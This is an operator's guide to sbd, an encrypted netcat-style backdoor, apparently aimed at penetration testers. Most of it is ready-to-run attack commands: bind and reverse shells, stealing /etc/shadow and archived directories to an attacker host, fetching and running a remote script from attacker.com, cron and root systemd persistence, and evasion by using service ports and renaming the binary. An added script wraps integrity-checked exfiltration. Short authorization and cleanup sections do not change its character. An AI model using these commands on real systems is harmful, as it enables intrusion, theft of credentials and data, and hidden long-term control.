
sbd - Secure Backdoor

sbd (Secure BackDoor) is a netcat clone designed to be portable and to offer strong encryption. Traffic is protected with AES-CBC-128 plus an HMAC-SHA1 authentication tag, keyed from a shared secret that both ends pass with -k. Unlike plain netcat, an observer on the network path cannot read the commands or files that flow through the session. Two limits are worth stating up front: if you omit -k, sbd uses its built-in default secret, so anyone with a copy of sbd can connect to your listener and the secret is the only access control; and sbd supports TCP only. It is useful for authorized penetration testing, red team exercises, and remote administration during controlled security assessments.

Key Capabilities:

  • AES-CBC-128 encryption with HMAC-SHA1 integrity protection, keyed from a shared secret (-k)
  • Netcat-compatible command syntax and options
  • Bi-directional encrypted data transmission over TCP
  • Shell access and command execution (-e)
  • File transfer through stdin/stdout redirection
  • Continuous reconnection with a configurable delay (-r)
  • Portable: Unix-like systems and Microsoft Win32 (including Cygwin)
  • Lightweight: the AES and SHA-1 code is bundled, so there is no OpenSSL dependency

Build from Source
# Clone or download the sbd source (sbd 1.37 is the release packaged by Kali)
git clone https://github.com/Kyuui/sbd.git
cd sbd

# sbd bundles its own AES and SHA-1 code (Christophe Devine's implementation),
# so it does not link OpenSSL: a C compiler and make are all that is needed.
# The Makefile carries per-platform targets; pick the one matching your system.
make

Install a C Toolchain (if needed)

# Debian/Ubuntu
apt-get update
apt-get install build-essential

# RHEL/CentOS
yum install gcc make

# macOS
xcode-select --install

# Arch Linux
pacman -S base-devel

Kali Linux

# Pre-installed on Kali Linux
sbd -h

# Or install if not present
apt-get update
apt-get install sbd

Windows

# Build under Cygwin (or a native Win32 toolchain) with the same Makefile;
# the resulting sbd.exe is used with -e cmd.exe instead of -e /bin/bash
make
Usage

# Print the version and the option list of your build
sbd -h
Listening (Server) Mode

# Create an encrypted listener on port 4444 (no program attached: stdin/stdout are relayed)
sbd -l -p 4444 -k secret

# Listener that hands the connecting client a shell (-e runs the program on connect)
sbd -l -p 4444 -k secret -e /bin/bash

# Without -k, sbd falls back to its built-in default secret: the traffic is still
# encrypted, but anyone with a copy of sbd can connect. Use a long random secret
# shared out of band, and limit who can reach the port with host firewall rules.
Client Mode

# Connect to an encrypted sbd listener (host and port are positional; -k must match the listener)
sbd -k secret 192.168.1.100 4444

# Skip DNS resolution for a numeric address
sbd -n -k secret 192.168.1.100 4444

# Connect by hostname
sbd -k secret target.com 4444
File Transfer

# Receive a file: the listener writes whatever the client sends to disk
sbd -l -p 4444 -k secret > received_file.bin

# Serve a file: the listener sends the file to the first client that connects
sbd -l -p 4444 -k secret < file_to_send.bin

# Push a file to a listener (the listener runs the receive form above)
sbd -k secret target.com 4444 < file_to_send.bin
Option Reference

Option       Purpose
-l           Listen mode (server)
-p PORT      Port to listen on or connect to
-k SECRET    Shared secret from which the session keys are derived; must match on both ends
-c on|off    Encryption on or off (default on); both ends must agree
-e PROG      Execute PROG once the connection is established
-r SECS      Respawn/reconnect indefinitely, pausing SECS seconds between attempts
-w SECS      Timeout for connects and for the final network read
-n           Numeric-only IP addresses, no DNS lookups
-v           Verbose mode
-h           Display help and version

The peer's host and port are positional arguments (sbd [options] HOST PORT); sbd is TCP only. Run sbd -h for the complete option list of your build.
Bind Shell

# On the target machine: the listener hands a shell to whoever connects with the right secret
sbd -l -p 9999 -k secret -e /bin/bash
# Waiting for connection on 0.0.0.0:9999

# On the attacker machine: connect
sbd -k secret target-server 9999
# Shell is now available, encrypted with AES-CBC-128 + HMAC-SHA1

# Interactive shell commands travel over the encrypted channel
ls -la
whoami
pwd
cat /etc/passwd

# A listener serves one connection at a time; with -e it exits when that
# session ends, so restart it or use cron/systemd to keep it up.
# On the attacker machine, start the receiver first
sbd -l -p 4444 -k secret > stolen_shadow.txt

# On the target machine (as root), exfiltrate the sensitive file
sbd -k secret attacker-ip 4444 < /etc/shadow

# Verify received data
cat stolen_shadow.txt
# Send a single command through the encrypted channel (listener runs with -e /bin/bash)
echo "whoami" | sbd -k secret target.com 4444

# Capture output; -w gives sbd a timeout for the final network read after stdin closes
echo "id; uname -a" | sbd -w 5 -k secret target.com 4444 | tee command_output.txt
Persistence (Bind Shell)

# Place sbd on the compromised system
cp sbd /usr/local/bin/

# Cron: bind fails while a listener is already running, so this only relaunches
# the shell after the previous instance has exited. Append to the existing
# crontab; piping a single line into crontab - would replace every entry.
(crontab -l 2>/dev/null; echo "*/5 * * * * /usr/local/bin/sbd -l -p 4444 -k secret -e /bin/bash") | crontab -

# Or a systemd service (Restart=always relaunches the listener after each session)
cat > /etc/systemd/system/sbd-shell.service << 'EOF'
[Unit]
Description=SBD Encrypted Shell
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/sbd -l -p 4444 -k secret -e /bin/bash
Restart=always
User=root

[Install]
WantedBy=multi-user.target
EOF

systemctl daemon-reload
systemctl enable sbd-shell
systemctl start sbd-shell
Reverse Shell

# On the attacker machine: a plain listener, no -e (the shell comes from the target;
# a listener with -e here would hand the target a shell on the attacker's box)
sbd -l -p 4444 -k secret

# On the target machine: connect back and attach a shell; -r retries forever,
# pausing 30 seconds between attempts, so a dropped session comes back on its own
/path/to/sbd -k secret -r 30 -e /bin/bash attacker-ip 4444 &

# Or, if sbd is on the PATH
sbd -k secret -r 30 -e /bin/bash attacker-ip 4444 &
Pivoting From the Shell

# sbd is not a port forwarder: its encryption covers only the sbd session itself
sbd -l -p 4444 -k secret -e /bin/bash

# Anything started from inside that shell, such as a plain netcat listener, is a
# separate connection that sbd does not protect; traffic to port 8000 is cleartext
nc -l -p 8000 -e /bin/bash
# Multiple encrypted connections: one listener serves one session, so run one per port
sbd -l -p 4444 -k secret -e /bin/bash &
sbd -l -p 4445 -k secret -e /bin/bash &
sbd -l -p 4446 -k secret -e /bin/bash &

# Connect to specific instances
sbd -k secret target 4444
sbd -k secret target 4445
sbd -k secret target 4446
Timeouts and Retries

# Give up on the connect, and on the final network read, after 30 seconds
sbd -w 30 -k secret target.com 4444

# Keep retrying every 5 seconds while the listener is not up yet
sbd -r 5 -k secret target.com 4444
# Reverse shell built from pipes instead of -e
# On the attacker machine
sbd -l -p 4444 -k secret

# On the target: sbd feeds the socket into a FIFO that bash reads, and bash's
# output goes back through the same sbd process
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | sbd -k secret attacker-ip 4444 > /tmp/f

# Do not combine this with bash's /dev/tcp pseudo-device: that opens its own
# connection straight to the attacker and sends the shell in cleartext
# Compress and transfer through the encrypted channel (start the receiver first)
tar czf - /sensitive/data | sbd -k secret attacker 4444

# Receive and decompress
sbd -l -p 4444 -k secret > data.tar.gz
tar xzf data.tar.gz
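sbd authenticates what it carries, but it gives no end-of-stream signal: if the connection drops, the receiver is left with a silently truncated archive that tar may still partly extract. The following is an added example, not sbd's own code or anything from this page's original, that wraps the compress-and-transfer step above in a SHA-256 check. The transport is passed as a command, so the script runs offline with `cat` and in the field with `sbd -k <secret> <host> <port>`; the directory names, the sidecar hash file and the field usage lines are assumptions.

```shell
#!/usr/bin/env bash
# Added example: integrity-checked archive transfer over an sbd channel.
# The sender records a SHA-256 of the archive in a sidecar file that travels
# out of band (operator notes, a second sbd session); the receiver compares
# before extracting. Paths and the transport command are assumptions.
set -euo pipefail

# pack_and_send DIR HASHFILE TRANSPORT...
# Builds DIR into a gzip tarball, writes its SHA-256 to HASHFILE, then feeds
# the archive to TRANSPORT's stdin. TRANSPORT's stdout is left alone, so the
# caller decides where it goes (a file here, the socket when TRANSPORT is sbd).
pack_and_send() {
  local dir=$1 hashfile=$2
  shift 2
  [ $# -gt 0 ] || { echo "pack_and_send: transport command required" >&2; return 2; }
  local tmp
  tmp=$(mktemp)
  tar czf "$tmp" -C "$(dirname "$dir")" "$(basename "$dir")"
  sha256sum "$tmp" | cut -d' ' -f1 > "$hashfile"
  "$@" < "$tmp"
  rm -f "$tmp"
}

# verify_received ARCHIVE EXPECTED_SHA256
# Returns 0 only if the bytes on disk hash to the sender's value and the
# archive lists cleanly; anything else means retransfer, not extract.
verify_received() {
  local got
  got=$(sha256sum "$1" | cut -d' ' -f1)
  [ "$got" = "$2" ] && tar tzf "$1" > /dev/null 2>&1
}

# Field usage (assumed hosts/ports), sender on the compromised machine:
#   pack_and_send /sensitive/docs /tmp/docs.sha256 sbd -k secret attacker 4444
# Receiver, with the hash read back out of band:
#   sbd -l -p 4444 -k secret > exfiltrated_data.tgz
#   verify_received exfiltrated_data.tgz "$HASH" && tar xzf exfiltrated_data.tgz
```

The hash is computed on the sender's finished archive, not on the live stream, so the receiver learns whether it has the whole thing rather than just whether each packet arrived intact.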
# Command piping through the encrypted channel (listener runs with -e /bin/bash)
echo "cat /etc/passwd | wc -l" | sbd -k secret target 4444

# Multi-step commands; the heredoc is sent once, in order
sbd -k secret target 4444 << 'EOF'
cd /tmp
wget http://attacker.com/script.sh
chmod +x script.sh
./script.sh
EOF
# Launch a listener in the background
sbd -l -p 4444 -k secret -e /bin/bash &

# Get job ID
jobs -l

# Reconnect at will (a listener started with -e serves one session and then
# exits; use cron or systemd to keep one running)
sbd -k secret target 4444

Integration with Penetration Testing Workflow

# After initial compromise (e.g., a web shell), deploy sbd for encrypted communications

# Transfer the sbd binary
wget http://attacker.com/sbd -O /tmp/sbd
chmod +x /tmp/sbd

# Start the encrypted shell server with an engagement-specific secret
/tmp/sbd -l -p 4444 -k secret -e /bin/bash &

# Connect from the attacker machine; the channel is only as secure as that secret
sbd -k secret target-ip 4444
# Stage 1: Create the listener on the attacker machine
sbd -l -p 4444 -k secret > exfiltrated_data.bin

# Stage 2: On the compromised system
tar czf - /sensitive/docs | sbd -k secret attacker 4444

# Stage 3: Extract the data
tar xzf exfiltrated_data.bin
# Maintain an encrypted C2 channel
sbd -l -p 4444 -k secret -e /bin/bash

# A listener serves one connection at a time, so give each operator their own
# port and share the secret with the team out of band
sbd -k secret target 4444
# Monitor for sbd activity (if needed)
netstat -tupan | grep 4444

# Check process listening
ss -tlnp | grep sbd
# Use common service ports (binding below 1024 requires root, and the port must
# not already be held by the real service)
sbd -l -p 443 -k secret -e /bin/bash    # HTTPS port
sbd -l -p 80 -k secret -e /bin/bash     # HTTP port
sbd -l -p 22 -k secret -e /bin/bash     # SSH port (only if sshd is not running)
sbd -l -p 53 -k secret -e /bin/bash     # DNS port (TCP 53; sbd is TCP only)
# Rename the binary (a name-based check such as grep sbd then misses it)
cp sbd ss
./ss -l -p 4444 -k secret -e /bin/bash

# The rename changes only the process name: the listening socket, the file's
# hash and the cron or systemd launcher remain visible to a defender
Troubleshooting

# Verify listener is running
ps aux | grep sbd

# Check if port is listening
netstat -tulnp | grep 4444
ss -tulnp | grep 4444

# Verify firewall rules
iptables -L -n
# Check library dependencies: sbd bundles its own AES and SHA-1 code, so a
# normal build depends only on libc (no libssl or libcrypto should appear)
ldd ./sbd

# If a dynamically linked build will not start on a target with an older libc,
# rebuild it statically by adding -static to the linker flags in the Makefile
# Increase the connect/read timeout
sbd -w 60 -k secret target 4444

# Check network connectivity
ping target
traceroute target
# Connection accepted but the session ends at once or prints garbage: the shared
# secret or the encryption setting differs between the ends. Both sides must use
# the same -k value and the same -c on|off setting.
sbd -l -p 4444 -k secret -c on -e /bin/bash    # server
sbd -k secret -c on target 4444                # client

# Mixed releases can also fail to interoperate; check the version on both ends
sbd -h
Performance

# The per-packet cost is AES-CBC-128 plus an HMAC-SHA1 tag, so throughput is
# dominated by the network, not the cipher; measure rather than assume
time sbd -k secret target 4444 < largefile

# Monitor with iftop or nethogs
iftop -i eth0
nethogs eth0

# AES-CBC-128 is cheap even on small CPUs; check during a transfer
top -p $(pgrep sbd)

# On CPU-constrained systems, keep transfers small or split large files
  • Use sbd only in authorized penetration testing environments
  • Maintain clear rules of engagement and written authorization
  • Document all sbd deployments and connections
  • Clean up all sbd artifacts post-assessment
# Use non-standard high-numbered ports
sbd -l -p 47777 -k secret -e /bin/bash

# Restrict who can reach the listener: accept the engagement's source range, drop the rest
iptables -A INPUT -p tcp --dport 4444 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 4444 -j DROP

# Monitor for unexpected sbd processes
find / -name sbd 2>/dev/null
ps aux | grep -v grep | grep sbd
# Remove only the binaries you deployed; a blanket find / -name sbd -delete
# would also remove the distribution's own /usr/bin/sbd on a Kali host
rm -f /usr/local/bin/sbd /tmp/sbd

# Remove only the sbd cron entries (crontab -r would wipe every job of that user)
crontab -l | grep -v sbd | crontab -

# Remove the systemd service
systemctl disable --now sbd-shell
rm /etc/systemd/system/sbd-shell.service
systemctl daemon-reload

# Confirm no listener or shell child is left behind (the bracket avoids matching grep itself)
ps aux | grep -E "[s]bd"
ss -tlnp
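The cleanup one-liners on this page carry collateral damage: `find / -name sbd -delete` also deletes a Kali host's packaged `/usr/bin/sbd`, and `crontab -r` removes every cron job of the user, not just the one you added. The helpers below are an added example (not sbd's code and not from the page's original) that put the audit and cleanup logic in functions operating on text, so the result can be reviewed before anything is removed. The match pattern, the directory argument and the sample crontab/`ss` lines in the comments are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: audit and remove sbd persistence without collateral damage.
# Functions take text (crontab -l output, ss -tlnp output, a unit directory)
# so the same logic runs offline on constructed samples and on a live host.
set -euo pipefail

# Matches "sbd -l ..." and "/usr/local/bin/sbd -l ..." but not "sbdaemon".
# Assumed to be enough for a first pass; review the output before deleting.
SBD_PATTERN='(^|[/ ])sbd( |$)'

# Cron lines that launch sbd (stdin: output of crontab -l). grep exits 1 on
# no match, which is not an error for an audit, hence the || true.
find_sbd_cron_lines() { grep -E "$SBD_PATTERN" || true; }

# The same crontab with only the sbd lines removed. Field usage:
#   crontab -l | strip_sbd_cron_lines | crontab -
strip_sbd_cron_lines() { grep -Ev "$SBD_PATTERN" || true; }

# systemd unit files under DIR whose ExecStart runs sbd; disable each with
# systemctl disable --now, then delete the file and run daemon-reload.
find_sbd_units() {
  grep -lE "^ExecStart=.*$SBD_PATTERN" "$1"/*.service 2>/dev/null || true
}

# Listening sockets owned by a process named sbd (stdin: ss -tlnp output).
# Prints "port=PORT pid=PID". A renamed binary (cp sbd ss) does not match by
# name; for every other listener compare readlink /proc/PID/exe and its hash
# against the deployed file.
find_sbd_listeners() {
  awk '/LISTEN/ && /"sbd"/ {
         n = split($4, a, ":");           # local address is field 4; port is last piece
         match($0, /pid=[0-9]+/);         # pid lives inside users:(("sbd",pid=N,fd=M))
         print "port=" a[n] " " substr($0, RSTART, RLENGTH)
       }'
}

# Constructed sample, as an audit on a live host would see it:
#   crontab -l | find_sbd_cron_lines
#   */5 * * * * /usr/local/bin/sbd -l -p 4444 -e /bin/bash
#   ss -tlnp | find_sbd_listeners
#   port=4444 pid=31337
```

Run the `find_*` functions first and keep their output with the engagement record; only then feed `strip_sbd_cron_lines` back into `crontab -` and remove the listed unit files.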
Related Tools

  • socat - Netcat replacement with SSL/TLS support
  • cryptcat - nc with simple encryption
  • ncat - Netcat with SSL/TLS capabilities
  • SSH tunneling - Industry standard encrypted shell access

Further Reading

  • OpenSSL Documentation and AES Encryption
  • Penetration Testing with Encrypted Communications
  • Network Encryption and Detection Evasion
  • Command and Control Infrastructure Design
  • Post-Exploitation Persistence Techniques